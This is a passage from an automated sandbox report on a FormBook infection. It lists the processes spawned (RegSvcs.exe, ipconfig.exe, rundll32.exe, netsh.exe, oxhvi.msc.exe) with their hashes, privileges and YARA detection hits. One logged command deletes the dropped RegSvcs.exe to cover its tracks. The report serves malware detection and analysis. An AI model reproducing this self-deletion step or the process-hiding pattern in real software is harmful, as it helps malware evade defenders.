                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.1666060455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.1666060455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.1666060455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.1666060455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.1666060455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    Antivirus matches:
                                                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:16
                                                                                                                                                    Start time:09:57:29
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                                                                                                                                                    Imagebase:0xf90000
                                                                                                                                                    File size:45'984 bytes
                                                                                                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:17
                                                                                                                                                    Start time:09:57:30
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                    Imagebase:0x7ff62d7d0000
                                                                                                                                                    File size:5'141'208 bytes
                                                                                                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000011.00000002.2649074855.0000000010EA2000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                    Has exited:false

                                                                                                                                                    General

                                                                                                                                                    Target ID:18
                                                                                                                                                    Start time:09:57:30
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Windows\SysWOW64\ipconfig.exe"
                                                                                                                                                    Imagebase:0xa70000
                                                                                                                                                    File size:29'184 bytes
                                                                                                                                                    MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.2628887806.0000000002A80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.2628887806.0000000002A80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.2628887806.0000000002A80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.2628887806.0000000002A80000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.2628887806.0000000002A80000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.2628367776.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.2628367776.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.2628367776.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.2628367776.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.2628367776.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.2628964763.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.2628964763.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.2628964763.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.2628964763.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.2628964763.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    Has exited:false

                                                                                                                                                    General

                                                                                                                                                    Target ID:19
                                                                                                                                                    Start time:09:57:32
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Windows\SysWOW64\rundll32.exe"
                                                                                                                                                    Imagebase:0xd80000
                                                                                                                                                    File size:61'440 bytes
                                                                                                                                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.1690629152.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.1690629152.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.1690629152.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.1690629152.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.1690629152.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:20
                                                                                                                                                    Start time:09:57:33
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:/c del "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                                                                                                                                                    Imagebase:0xa40000
                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:21
                                                                                                                                                    Start time:09:57:33
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:22
                                                                                                                                                    Start time:09:57:37
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE" C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOC
                                                                                                                                                    Imagebase:0x290000
                                                                                                                                                    File size:947'288 bytes
                                                                                                                                                    MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000003.1778571483.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000003.1778571483.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000003.1778571483.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000003.1778571483.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000003.1778571483.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000003.1784873248.0000000000E34000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000003.1784873248.0000000000E34000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000003.1784873248.0000000000E34000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000003.1784873248.0000000000E34000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000003.1784873248.0000000000E34000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000003.1781279846.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000003.1781279846.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000003.1781279846.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000003.1781279846.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000003.1781279846.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000003.1779088648.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000003.1779088648.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000003.1779088648.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000003.1779088648.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000003.1779088648.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000003.1785265319.000000000378C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000003.1785265319.000000000378C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000003.1785265319.000000000378C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000003.1785265319.000000000378C000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000003.1785265319.000000000378C000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000003.1779323188.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000003.1779323188.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000003.1779323188.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000003.1779323188.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000003.1779323188.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000003.1785169179.0000000000D7D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000003.1785169179.0000000000D7D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000003.1785169179.0000000000D7D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000003.1785169179.0000000000D7D000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000003.1785169179.0000000000D7D000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000003.1785668153.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000003.1785668153.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000003.1785668153.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000003.1785668153.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000003.1785668153.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000003.1778617142.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000003.1778617142.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000003.1778617142.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000003.1778617142.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000003.1778617142.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000003.1784873248.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000003.1784873248.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000003.1784873248.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000003.1784873248.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000003.1784873248.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000003.1779404808.0000000000E42000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000003.1779404808.0000000000E42000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000003.1779404808.0000000000E42000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000003.1779404808.0000000000E42000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000003.1779404808.0000000000E42000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000003.1778666606.0000000000E06000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000003.1778666606.0000000000E06000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000003.1778666606.0000000000E06000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000003.1778666606.0000000000E06000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000003.1778666606.0000000000E06000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000003.1785086182.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000003.1785086182.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000003.1785086182.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000003.1785086182.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000003.1785086182.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    Antivirus matches:
                                                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:23
                                                                                                                                                    Start time:09:57:44
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                                                                                                                                                    Imagebase:0xbc0000
                                                                                                                                                    File size:45'984 bytes
                                                                                                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:24
                                                                                                                                                    Start time:09:57:44
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                                                                                                                                                    Imagebase:0xb90000
                                                                                                                                                    File size:45'984 bytes
                                                                                                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:25
                                                                                                                                                    Start time:09:57:45
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Windows\SysWOW64\netsh.exe"
                                                                                                                                                    Imagebase:0x15c0000
                                                                                                                                                    File size:82'432 bytes
                                                                                                                                                    MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000019.00000002.1824428727.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000019.00000002.1824428727.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000019.00000002.1824428727.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000019.00000002.1824428727.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000019.00000002.1824428727.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:26
                                                                                                                                                    Start time:09:57:45
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Windows\SysWOW64\netsh.exe"
                                                                                                                                                    Imagebase:0x15c0000
                                                                                                                                                    File size:82'432 bytes
                                                                                                                                                    MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001A.00000002.1823176871.0000000000FC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001A.00000002.1823176871.0000000000FC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001A.00000002.1823176871.0000000000FC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001A.00000002.1823176871.0000000000FC0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001A.00000002.1823176871.0000000000FC0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:27
                                                                                                                                                    Start time:09:57:50
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE" C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOC
                                                                                                                                                    Imagebase:0x290000
                                                                                                                                                    File size:947'288 bytes
                                                                                                                                                    MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000003.1914895579.0000000001A12000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001B.00000003.1914895579.0000000001A12000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001B.00000003.1914895579.0000000001A12000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000003.1914895579.0000000001A12000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
